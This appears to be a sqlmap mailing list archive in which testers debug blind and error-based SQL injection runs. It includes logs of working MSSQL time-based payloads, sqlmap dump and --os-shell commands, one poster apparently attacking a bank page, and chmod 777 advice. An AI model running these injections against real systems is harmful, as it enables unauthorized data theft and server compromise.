> That works fine and I get good results. However, when I try to dump table names now (from one of the known databases) with the -D DB_NAME and --tables switch, it is again failing to retrieve the number of tables:
>
> [14:51:53] [INFO] fetching tables for database: DB_NAME
> [14:51:53] [INFO] fetching number of tables for database 'DB_NAME'
> [14:51:53] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>66) WAITFOR DELAY '0:0:10'; --
> [14:51:53] [WARNING] time-based comparison requires larger statistical model, please wait..............................
> [14:52:26] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
> [14:52:56] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>97) WAITFOR DELAY '0:0:10'; --
> [14:52:56] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
> [14:53:26] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>101) WAITFOR DELAY '0:0:10'; --
> [14:54:56] [INFO] retrieved:
> [14:54:56] [DEBUG] performed 5 queries in 183.70 seconds
> [...]
> [14:57:27] [INFO] retrieved:
> [14:57:27] [DEBUG] performed 5 queries in 150.30 seconds
> [...]
> [14:59:57] [INFO] retrieved:
> [14:59:57] [DEBUG] performed 5 queries in 150.26 seconds
> [14:59:57] [WARNING] unable to retrieve the number of tables for database 'DB_NAME'
> [14:59:57] [CRITICAL] unable to retrieve the tables for any database
>
> Any suggestions? Using higher --time-sec, --hex or --no-cast didn't help. Using --start and --stop also didn't work. I can't get any data out of it like this.
>
> Best regards,
> floyd
From: floyd <flo...@ya...> - 2014-09-23 14:26:53
Hi everybody

I'm doing a Pentest and I'm able to do a time based blind sql injection on a very big database.

It takes some time, but that's fine for now. But sqlmap is failing when it comes to retrieving the *number of [databases, tables, columns, whatever]*:

$ /opt/sqlmap-dev/sqlmap.py -r http_req1_v2.txt -p "redactedParameter" --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0" --level=5 --risk=3 --dbms=MSSQL --os=Windows --suffix="; --" --prefix="';" --technique=T -v 3 --time-sec=2 --proxy socks5://localhost:5050 --dbs -o
[...snip...]
[11:57:49] [INFO] confirming Microsoft SQL Server
[11:57:49] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.X.XXXXX (redacted)
back-end DBMS: Microsoft SQL Server 2008
[11:57:49] [INFO] fetching database names
[11:57:49] [INFO] fetching number of databases
[11:57:49] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[11:57:49] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases),1,1))>51) WAITFOR DELAY '0:0:2'; --
[11:57:49] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[11:58:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases),1,1))>54) WAITFOR DELAY '0:0:2'; --
[11:58:25] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[11:58:55] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases),1,1))>56) WAITFOR DELAY '0:0:2'; --
[11:59:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases),1,1))>57) WAITFOR DELAY '0:0:2'; --
[11:59:55] [INFO] retrieved:
[11:59:55] [DEBUG] performed 4 queries in 126.19 seconds
[11:59:55] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[11:59:55] [ERROR] unable to retrieve the number of databases

However, for the *database names* sqlmap will continue with the DB_NAME(X) technique. Right now it is dumping out all the different database names, which works fine:

[15:08:34] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(DB_NAME(110) AS NVARCHAR(4000)),CHAR(32))),16,1))!=109) WAITFOR DELAY '0:0:2'; --

Because I got many of the following errors (and the occurrence of the error is random), I patched the time delay in the python code to be fixed to 2 seconds (maybe you want to have an option for that):

[15:03:14] [ERROR] invalid character detected. retrying..
[15:03:14] [WARNING] increasing time delay to 3 seconds

That works fine and I get good results. However, when I try to dump table names now (from one of the known databases) with the -D DB_NAME and --tables switch, it is again failing to retrieve the number of tables:

[14:51:53] [INFO] fetching tables for database: DB_NAME
[14:51:53] [INFO] fetching number of tables for database 'DB_NAME'
[14:51:53] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>66) WAITFOR DELAY '0:0:10'; --
[14:51:53] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[14:52:26] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[14:52:56] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>97) WAITFOR DELAY '0:0:10'; --
[14:52:56] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[14:53:26] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>101) WAITFOR DELAY '0:0:10'; --
[14:54:56] [INFO] retrieved:
[14:54:56] [DEBUG] performed 5 queries in 183.70 seconds
[...]
[14:57:27] [INFO] retrieved:
[14:57:27] [DEBUG] performed 5 queries in 150.30 seconds
[...]
[14:59:57] [INFO] retrieved:
[14:59:57] [DEBUG] performed 5 queries in 150.26 seconds
[14:59:57] [WARNING] unable to retrieve the number of tables for database 'DB_NAME'
[14:59:57] [CRITICAL] unable to retrieve the tables for any database

Any suggestions? Using higher --time-sec, --hex or --no-cast didn't help. Using --start and --stop also didn't work. I can't get any data out of it like this.

Best regards,
floyd
From: bockor <bo...@ya...> - 2014-09-17 11:09:44
Thanks!

17.09.2014, 12:19, "Miroslav Stampar" <mir...@gm...>:
> Fixed with https://github.com/sqlmapproject/sqlmap/commit/ffa7e2f6e905a5bd0aeab98b51f512529e5024e0#diff-ee248665d16721810ef658a78e5d83a2
>
> On Sun, Sep 14, 2014 at 7:29 PM, bockor <bo...@ya...> wrote:
>> sqlmap version: 1.0-dev
>> Python version: 2.7.6
>> Operating system: posix
>> Command line: ./sqlmap.py --beep --page-rank --batch --tor --threads=5 --random-agent -g ********************
>> Technique: None
>> Back-end DBMS: None (identified)
>> Traceback (most recent call last):
>>   File "./sqlmap.py", line 95, in main
>>     start()
>>   File "/home/bockor/sqlmap/lib/controller/controller.py", line 311, in start
>>     message = "URL %d:\n%s %s%s" % (hostCount, conf.method or HTTPMETHOD.GET, targetUrl, " (PageRank: %s)" % get_pagerank(targetUrl) if conf.googleDork and conf.pageRank else "")
>>   File "/home/bockor/sqlmap/thirdparty/pagerank/pagerank.py", line 18, in get_pagerank
>>     _ = 'http://toolbarqueries.google.com/tbr?client=navclient-auto&features=Rank&ch=%s&q=info:%s' % (check_hash(hash_url(url)), urllib.quote(url))
>>   File "/usr/lib/python2.7/urllib.py", line 1288, in quote
>>     return ''.join(map(quoter, s))
>> KeyError: u'\xc3'
>
> --
> Miroslav Stampar
> http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2014-09-17 08:30:28
Hi Nedko.

Thank you for your report. It should be fixed now.

Bye

On Wed, Sep 17, 2014 at 9:09 AM, Nedko Hristov <ne...@st...> wrote:
> Hi guys. I tried to run sqlmap against a company's script that I'm testing and got the following error message, with the uname -a and errors on exit:
>
> root@nedko:/var/www/sqlmap# python sqlmap.py --sqlmap-shell
> sqlmap-shell> -u "http://192.168.0.50/blog/install/index.php?controller=pjLoad&action=pjActionView&id=2" --technique=BEU --banner --batch
>
> [10:05:59] [CRITICAL] unhandled exception in sqlmap/1.0-dev-nongit-20140917, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev
> Python version: 2.7.6
> Operating system: posix
> Command line: sqlmap.py --sqlmap-shell
> Technique: None
> Back-end DBMS: None (identified)
> Traceback (most recent call last):
>   File "sqlmap.py", line 72, in main
>     cmdLineOptions.update(cmdLineParser().__dict__)
>   File "/var/www/sqlmap/lib/parse/cmdline.py", line 829, in cmdLineParser
>     saveHistory(AUTOCOMPLETE_TYPE.SQLMAP)
>   File "/var/www/sqlmap/lib/core/shell.py", line 52, in saveHistory
>     readline.write_history_file(historyPath)
> IOError: [Errno 2] No such file or directory
>
> If you need more steps to reproduce feel free to write me here.
>
> Regards,
> Nedko Hristov
> SQA @ StivaSoft.com

--
Miroslav Stampar
http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2014-09-17 08:19:46
Fixed with https://github.com/sqlmapproject/sqlmap/commit/ffa7e2f6e905a5bd0aeab98b51f512529e5024e0#diff-ee248665d16721810ef658a78e5d83a2

On Sun, Sep 14, 2014 at 7:29 PM, bockor <bo...@ya...> wrote:
> sqlmap version: 1.0-dev
> Python version: 2.7.6
> Operating system: posix
> Command line: ./sqlmap.py --beep --page-rank --batch --tor --threads=5 --random-agent -g ********************
> Technique: None
> Back-end DBMS: None (identified)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 95, in main
>     start()
>   File "/home/bockor/sqlmap/lib/controller/controller.py", line 311, in start
>     message = "URL %d:\n%s %s%s" % (hostCount, conf.method or HTTPMETHOD.GET, targetUrl, " (PageRank: %s)" % get_pagerank(targetUrl) if conf.googleDork and conf.pageRank else "")
>   File "/home/bockor/sqlmap/thirdparty/pagerank/pagerank.py", line 18, in get_pagerank
>     _ = 'http://toolbarqueries.google.com/tbr?client=navclient-auto&features=Rank&ch=%s&q=info:%s' % (check_hash(hash_url(url)), urllib.quote(url))
>   File "/usr/lib/python2.7/urllib.py", line 1288, in quote
>     return ''.join(map(quoter, s))
> KeyError: u'\xc3'

--
Miroslav Stampar
http://about.me/stamparm
From: Nedko H. <ne...@st...> - 2014-09-17 08:16:27
Hi guys. I tried to run sqlmap against a company's script that I'm testing and got the following error message, with the uname -a and errors on exit:

root@nedko:/var/www/sqlmap# python sqlmap.py --sqlmap-shell
sqlmap-shell> -u "http://192.168.0.50/blog/install/index.php?controller=pjLoad&action=pjActionView&id=2" --technique=BEU --banner --batch

[10:05:59] [CRITICAL] unhandled exception in sqlmap/1.0-dev-nongit-20140917, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev
Python version: 2.7.6
Operating system: posix
Command line: sqlmap.py --sqlmap-shell
Technique: None
Back-end DBMS: None (identified)
Traceback (most recent call last):
  File "sqlmap.py", line 72, in main
    cmdLineOptions.update(cmdLineParser().__dict__)
  File "/var/www/sqlmap/lib/parse/cmdline.py", line 829, in cmdLineParser
    saveHistory(AUTOCOMPLETE_TYPE.SQLMAP)
  File "/var/www/sqlmap/lib/core/shell.py", line 52, in saveHistory
    readline.write_history_file(historyPath)
IOError: [Errno 2] No such file or directory

If you need more steps to reproduce feel free to write me here.

Regards,
Nedko Hristov
SQA @ StivaSoft.com
From: bockor <bo...@ya...> - 2014-09-14 17:42:28
sqlmap version: 1.0-dev
Python version: 2.7.6
Operating system: posix
Command line: ./sqlmap.py --beep --page-rank --batch --tor --threads=5 --random-agent -g ********************
Technique: None
Back-end DBMS: None (identified)
Traceback (most recent call last):
  File "./sqlmap.py", line 95, in main
    start()
  File "/home/bockor/sqlmap/lib/controller/controller.py", line 311, in start
    message = "URL %d:\n%s %s%s" % (hostCount, conf.method or HTTPMETHOD.GET, targetUrl, " (PageRank: %s)" % get_pagerank(targetUrl) if conf.googleDork and conf.pageRank else "")
  File "/home/bockor/sqlmap/thirdparty/pagerank/pagerank.py", line 18, in get_pagerank
    _ = 'http://toolbarqueries.google.com/tbr?client=navclient-auto&features=Rank&ch=%s&q=info:%s' % (check_hash(hash_url(url)), urllib.quote(url))
  File "/usr/lib/python2.7/urllib.py", line 1288, in quote
    return ''.join(map(quoter, s))
KeyError: u'\xc3'
From: Rodrigo Z. S. <rod...@gm...> - 2014-09-07 22:38:11
Wow... The more I read the manual, the more I see I can't do it. The best option until now was to use a TRUE and FALSE case. The predict-output ISN'T what I thought it was.

Hum... What I want to do is just:
-> Do a great sql code and download a html page
-> Run a function: u_char translate_page("html_page").
-> Use the number, from 0 to 255, to continue doing any hack because this is the translated value.

I just want to write this function and use all the good things from the program. Although I can append some code in sql, I need to use the downloaded page. Any tip?

2014-09-07 16:34 GMT-03:00 Rodrigo Zanatta Silva <rod...@gm...>:
> Hi friends.
>
> I found a sqlinject in one page before even knowing this great tool. This works in a simple way:
>
> I can get any character from the table, then I convert it to a number and it downloads a bank page. (I don't know how to translate it to English.) Anyway, this page has a unique number. So, I list all 1 to 255 unique numbers. If my sql downloads one page, I just compare the number and get the value. With it, I can get anything (even files).
>
> But sqlmap has a good and very tested way to dump the database. Mine was crap. So, how can I translate this to the program? Although it CAN download the database, I can make it faster. The program gets some letters and tests with greater than a number. I can speed it up because every download WILL return one value.
>
> But the ironic thing is that I will need to use only one thread. Lol, this is useless. What are my options :D
>
> Just to be clear, I do a sql command, it returns, like, id=78, and downloads one page (I can't get the URL of the returned page). After I download it (40kb), I do a small python command to parse the number (just get a text between two texts), then just compare in a case and get the value.
>
> Any tip?
From: Rodrigo Z. S. <rod...@gm...> - 2014-09-07 19:34:58
Hi friends.

I found a sqlinject in one page before even knowing this great tool. This works in a simple way:

I can get any character from the table, then I convert it to a number and it downloads a bank page. (I don't know how to translate it to English.) Anyway, this page has a unique number. So, I list all 1 to 255 unique numbers. If my sql downloads one page, I just compare the number and get the value. With it, I can get anything (even files).

But sqlmap has a good and very tested way to dump the database. Mine was crap. So, how can I translate this to the program? Although it CAN download the database, I can make it faster. The program gets some letters and tests with greater than a number. I can speed it up because every download WILL return one value.

But the ironic thing is that I will need to use only one thread. Lol, this is useless. What are my options :D

Just to be clear, I do a sql command, it returns, like, id=78, and downloads one page (I can't get the URL of the returned page). After I download it (40kb), I do a small python command to parse the number (just get a text between two texts), then just compare in a case and get the value.

Any tip?
From: Miroslav S. <mir...@gm...> - 2014-08-26 20:09:56
Hi. This looks strange, especially when considering the used options/switches and the SQL type.

Do you see "duplications" in console output while dumping entries? Do you get this kind of behavior in non-SQLITE format(s) too? Have you noticed duplicate error messages in the vulnerable web application?

Kind regards,
Miroslav Stampar

On Mon, Aug 25, 2014 at 11:07 AM, Michael Bachmann <mba...@gm...> wrote:
> Hi
>
> I try to dump a db. My command is as follows:
>
> sqlmap.py -c sqlmap.conf -D TheDb -T TheTable --dump --pivot-column=ID -X SomeNotNeededColumns -o --dump-format SQLITE
>
> The injection method is:
>
> Type: error-based
> Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
>
> If I do a count on this table I get:
>
> about 40k entries
>
> But when I check the dumped sqlite-db I get about 40k entries, but every ID is present at least 3 times. So if I do a distinct on ID, I get about 10k entries. Why is this?
>
> Sometimes the target throws the db-error "user can't login", I guess because of too high usage (probably a shared solution). Is this causing this behavior?
>
> Kind regards
> Michael

--
Miroslav Stampar
http://about.me/stamparm
From: Michael B. <mba...@gm...> - 2014-08-25 09:07:16
Hi

I try to dump a db. My command is as follows:

sqlmap.py -c sqlmap.conf -D TheDb -T TheTable --dump --pivot-column=ID -X SomeNotNeededColumns -o --dump-format SQLITE

The injection method is:

Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause

If I do a count on this table I get:

about 40k entries

But when I check the dumped sqlite-db I get about 40k entries, but every ID is present at least 3 times. So if I do a distinct on ID, I get about 10k entries. Why is this?

Sometimes the target throws the db-error "user can't login", I guess because of too high usage (probably a shared solution). Is this causing this behavior?

Kind regards
Michael
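A quick way to quantify a dump like the one above before blaming the tool: tell rows that were simply retrieved again (byte-for-byte identical) apart from rows that share an ID but disagree. This is an added example, not sqlmap's own code; the table, column names and rows are constructed to mimic the symptom.

```python
import sqlite3
from typing import Any, Dict, List, Tuple


def qid(name: str) -> str:
    """Quote an SQLite identifier (table or column name)."""
    return '"%s"' % name.replace('"', '""')


def build_sample_dump(path: str = ":memory:") -> sqlite3.Connection:
    """Constructed stand-in for a file written with --dump-format SQLITE.

    The table, columns and rows are invented for this example; rows are
    deliberately repeated so every ID appears more than once.
    """
    conn = sqlite3.connect(path)
    conn.execute('CREATE TABLE "TheTable" ("ID" TEXT, "Name" TEXT, "Email" TEXT)')
    rows = [
        ("1", "alice", "alice@example.invalid"),
        ("1", "alice", "alice@example.invalid"),   # identical repeat
        ("1", "alice", "alice@example.invalid"),   # identical repeat
        ("2", "bob", "bob@example.invalid"),
        ("2", "bob", "b?b@example.invalid"),       # same ID, content differs
        ("3", "carol", "carol@example.invalid"),
    ]
    conn.executemany('INSERT INTO "TheTable" VALUES (?, ?, ?)', rows)
    conn.commit()
    return conn


def duplicate_report(conn: sqlite3.Connection, table: str, pivot: str) -> Dict[str, Any]:
    """Count rows versus distinct pivot values and classify the duplicates.

    'identical_duplicates' lists pivot values whose repeated rows are all
    the same (the retrieval was repeated); 'conflicting_duplicates' lists
    pivot values whose rows disagree (the pivot is not unique, or a
    retrieval came back corrupted), which need manual review.
    """
    t, p = qid(table), qid(pivot)
    total = conn.execute("SELECT COUNT(*) FROM %s" % t).fetchone()[0]
    distinct = conn.execute("SELECT COUNT(DISTINCT %s) FROM %s" % (p, t)).fetchone()[0]
    identical: List[Tuple[str, int]] = []
    conflicting: List[Tuple[str, List[tuple]]] = []
    dup_keys = conn.execute(
        "SELECT %s FROM %s GROUP BY %s HAVING COUNT(*) > 1 ORDER BY %s" % (p, t, p, p)
    ).fetchall()
    for (key,) in dup_keys:
        rows = conn.execute("SELECT * FROM %s WHERE %s = ?" % (t, p), (key,)).fetchall()
        if len(set(rows)) == 1:
            identical.append((key, len(rows)))
        else:
            conflicting.append((key, rows))
    return {
        "total_rows": total,
        "distinct_pivot_values": distinct,
        "identical_duplicates": identical,
        "conflicting_duplicates": conflicting,
    }


def collapse_identical(conn: sqlite3.Connection, table: str, target: str) -> int:
    """Copy the table into 'target' with identical rows collapsed to one.

    Conflicting rows (same pivot, different content) are all kept so the
    analyst can decide which is right. Returns the new table's row count.
    """
    t, g = qid(table), qid(target)
    conn.execute("CREATE TABLE %s AS SELECT DISTINCT * FROM %s" % (g, t))
    conn.commit()
    return conn.execute("SELECT COUNT(*) FROM %s" % g).fetchone()[0]


if __name__ == "__main__":
    db = build_sample_dump()
    report = duplicate_report(db, "TheTable", "ID")
    print("rows: %d, distinct IDs: %d" % (report["total_rows"], report["distinct_pivot_values"]))
    print("identical repeats:", report["identical_duplicates"])
    print("conflicting IDs:", [k for k, _ in report["conflicting_duplicates"]])
    print("rows after collapsing identical repeats:", collapse_identical(db, "TheTable", "TheTable_clean"))
```

On a real dump, point build_sample_dump's sqlite3.connect at the file sqlmap wrote and pass the actual table and pivot column names.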
From: Robin W. <ro...@di...> - 2014-08-18 06:54:06
I'd assume on LAMP that the file is written using INTO OUTFILE, so what you could try is SSH to the box, use the MySQL client to connect as the user the web app uses and try to create the file manually just to see if it can be created.

Robin

On 18 Aug 2014 00:54, "Omara" <col...@ho...> wrote:
> I also get "it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path" when I try to read and write a file to the destination path on the DBMS. So the question now is, how to make the destination path /var/www/dvwa/hackable/uploads writable? The whole path has root permissions set, except the uploads folder has nobody permission set. I appreciate your help.
From: Omara <col...@ho...> - 2014-08-17 23:54:28
I also get "it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path" when I try to read and write a file to the destination path on the DBMS. So the question now is, how to make the destination path /var/www/dvwa/hackable/uploads writable? The whole path has root permissions set, except the uploads folder has nobody permission set. I appreciate your help.
From: Omara <col...@ho...> - 2014-08-17 22:56:27
Brandon Perry <bperry.volatile@...> writes:
>
> Can you write to /tmp?
>
> Pick a directory you KNOW you should be able to write to, and ensure you can write to that first.
>
> Also, maybe SELinux/AppArmor are getting in the way.
>
> On Fri, Aug 15, 2014 at 9:52 AM, Omara <coldhand-Pkb...@pu...> wrote:
>> Brandon Perry <bperry.volatile <at> ...> writes:
>>
>>> Can you write to /tmp?
>>> Instead of chowning the directory, just chmod -R 777 the dir you want to write the payload to, that's how many docs on the internet tell people to make an upload directory, for instance, writable by the web server.
>>>
>>> Of course, this is incorrect, but it's definitely easier than figuring out what your permissions really should be.
>>>
>>> On Thu, Aug 14, 2014 at 10:34 PM, M Omara <coldhand-Pkb...@pu...> wrote:
>>>> Brandon Perry <bperry.volatile <at> ...> writes:
>>>>
>>>>> Does the mysql user have write permissions on the web server? A properly configured web server where chown www-data:www-data was done, as opposed to chmod 777 on the web dir, which is an improper configuration, will not allow the mysql user to write to the web root.
>>>>
>>>> You are right, the /var/www has www-data:www-data set. So I created a temp folder inside the web root with nobody:nogroup permission but I am still getting the same error. Any more configurations I need to change in mysql db for this to work? Thank you in advance.
>>
>> I should be able to write to /var/www/WackoPicko/temp but I still get the same 404 error. I also give chmod 777 -R to /var/www/WackoPicko/users with no avail. Do I need to use different switches to be able to write to the web root? I added the --file-dest write switch but still not working. The man page says --os-shell works only with writable web root directory and I created one but it doesn't work. However, I can get SQL shell on the database.
>>
>> sqlmap -u "http://x.x.x.x/WackoPicko/users/login.php"--data "username=hacker&password=password&submit=login" --os-shell -v 1 --flush-session --file-dest=http://x.x.x.x/WackoPicko/users

I tried the same sqlmap command with different switches on DVWA and it worked. It's an ubuntu-based lampp web server with an "uploads" folder in its root with nobody permissions. But I still can't get to upload the stager file to OWASPBWA. I disabled apparmor as you recommended and the tmp folder is writable but it made no difference. I still get 404 not found.
From: Brandon P. <bpe...@gm...> - 2014-08-17 14:39:05
I have had this happen when an ORDER BY is usable, and the results of the ORDER BY differed from one injection to the next over a period of a few days.

On Sun, Aug 17, 2014 at 8:48 AM, Miroslav Stampar <mir...@gm...> wrote:
> Hi.
>
> Entries are resumed one by one as they are stored as pairs (query, result) in the local session database, where query represents the respective SQL query used to retrieve that same entry. If an entry doesn't appear to be the product of a valid "retrieval" it is not stored (this largely depends on the type of SQLI).
>
> You have to be more specific about your case (SQLI technique, content of "updated" entries, etc.) so I could be able to answer more precisely.
>
> Kind regards,
> Miroslav Stampar
>
> On Sun, Aug 17, 2014 at 11:16 AM, Michael Bachmann <mba...@gm...> wrote:
>> Hi guys
>>
>> I couldn't find any details regarding my topic.
>>
>> Could you please explain how the logic for resuming/retrieving while dumping works?
>>
>> Because I dumped a table, waited for it to be completed and then started a second dump. Most of the entries got resumed and I was wondering why there were new entries in the second dump I didn't have and also "updated" entries I already had.
>>
>> Best regards
>> Michael
>
> --
> Miroslav Stampar
> http://about.me/stamparm

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
From: Miroslav S. <mir...@gm...> - 2014-08-17 13:48:17
Hi.

Entries are resumed one by one as they are stored as pairs (query, result) in the local session database, where query represents the respective SQL query used to retrieve that same entry. If an entry doesn't appear to be the product of a valid "retrieval" it is not stored (this largely depends on the type of SQLI).

You have to be more specific about your case (SQLI technique, content of "updated" entries, etc.) so I could be able to answer more precisely.

Kind regards,
Miroslav Stampar

On Sun, Aug 17, 2014 at 11:16 AM, Michael Bachmann <mba...@gm...> wrote:
> Hi guys
>
> I couldn't find any details regarding my topic.
>
> Could you please explain how the logic for resuming/retrieving while dumping works?
>
> Because I dumped a table, waited for it to be completed and then started a second dump. Most of the entries got resumed and I was wondering why there were new entries in the second dump I didn't have and also "updated" entries I already had.
>
> Best regards
> Michael

--
Miroslav Stampar
http://about.me/stamparm
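Miroslav's description of the session store (entries kept as (query, result) pairs, invalid retrievals not stored) and Brandon's reply about an ORDER BY whose results change between injections, modelled in an added Python example that is not sqlmap's own code: the users table, the query shape and the simulated back end are constructed for illustration, and the model shows why a resumed dump can contain both "new" and "updated" entries.

```python
import re
import sqlite3
from typing import Callable, Dict, FrozenSet, Optional, Tuple

# Constructed sample table. Three rows share grp='staff', so an
# ORDER BY grp leaves their relative order up to the database engine.
ROWS = [("alice", "staff"), ("bob", "staff"), ("carol", "admin"), ("dave", "staff")]
# Constructed query shape: one row per query, addressed by offset.
QUERY = "SELECT name FROM users ORDER BY grp LIMIT 1 OFFSET {n}"


def make_backend(tie_order: str) -> Callable[[str], Optional[str]]:
    """Simulated back end answering one row per query.

    tie_order selects how rows with equal grp are ordered ('stable' keeps
    insertion order, 'reversed' flips it), standing in for an ORDER BY
    whose result differs from one run to the next.
    """
    source = ROWS if tie_order == "stable" else list(reversed(ROWS))
    ordered = sorted(source, key=lambda r: r[1])  # Python's sort is stable

    def fetch(query: str) -> Optional[str]:
        m = re.search(r"OFFSET (\d+)$", query)
        n = int(m.group(1)) if m else -1
        return ordered[n][0] if 0 <= n < len(ordered) else None

    return fetch


class SessionStore:
    """(query -> result) cache, a constructed stand-in for the session database."""

    def __init__(self) -> None:
        self.conn = sqlite3.connect(":memory:")
        self.conn.execute("CREATE TABLE storage (query TEXT PRIMARY KEY, value TEXT)")

    def resume(self, query: str) -> Optional[str]:
        row = self.conn.execute("SELECT value FROM storage WHERE query = ?", (query,)).fetchone()
        return row[0] if row else None

    def store(self, query: str, value: str) -> None:
        self.conn.execute("INSERT OR REPLACE INTO storage VALUES (?, ?)", (query, value))
        self.conn.commit()


def dump(session: SessionStore, fetch: Callable[[str], Optional[str]], nrows: int,
         invalid: FrozenSet[int] = frozenset()) -> Tuple[Dict[int, str], Dict[str, int]]:
    """Dump rows one by one: reuse a stored (query, result) pair when present,
    otherwise fetch it. Offsets listed in 'invalid' simulate retrievals that
    fail validation; they are counted but never stored."""
    out: Dict[int, str] = {}
    stats = {"resumed": 0, "fetched": 0, "discarded": 0}
    for n in range(nrows):
        q = QUERY.format(n=n)
        cached = session.resume(q)
        if cached is not None:
            out[n] = cached
            stats["resumed"] += 1
            continue
        value = fetch(q)
        if value is None or n in invalid:
            stats["discarded"] += 1
            continue
        session.store(q, value)
        out[n] = value
        stats["fetched"] += 1
    return out, stats


def diff_dumps(old: Dict[int, str], new: Dict[int, str]):
    """Entries present only in the new dump, and entries whose value changed."""
    added = {n: v for n, v in new.items() if n not in old}
    updated = {n: (old[n], v) for n, v in new.items() if n in old and old[n] != v}
    return added, updated


def demo() -> Dict[str, Tuple[Dict[int, str], Dict[str, int]]]:
    """Run 1 dumps with one tie order and loses offset 3 to an invalid
    retrieval. Run 2 resumes from the same session after the tie order has
    changed: resumed rows are stale, the re-fetched row is fresh, so the
    dump now holds 'alice' twice and 'dave' never. Run 3 starts a fresh
    session under the new order; diffed against run 1 it shows one added
    and one 'updated' entry, the effect Michael and Brandon describe."""
    session = SessionStore()
    run1 = dump(session, make_backend("stable"), len(ROWS), invalid=frozenset({3}))
    run2 = dump(session, make_backend("reversed"), len(ROWS))
    run3 = dump(SessionStore(), make_backend("reversed"), len(ROWS))
    return {"run1": run1, "run2": run2, "run3": run3}


if __name__ == "__main__":
    runs = demo()
    for name, (rows, stats) in runs.items():
        print(name, rows, stats)
    print("run3 vs run1 (added, updated):", diff_dumps(runs["run1"][0], runs["run3"][0]))
```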
From: Michael B. <mba...@gm...> - 2014-08-17 09:16:41
Hi guys

I couldn't find any details regarding my topic.

Could you please explain how the logic for resuming/retrieving while dumping works?

Because I dumped a table, waited for it to be completed and then started a second dump. Most of the entries got resumed and I was wondering why there were new entries in the second dump I didn't have and also "updated" entries I already had.

Best regards
Michael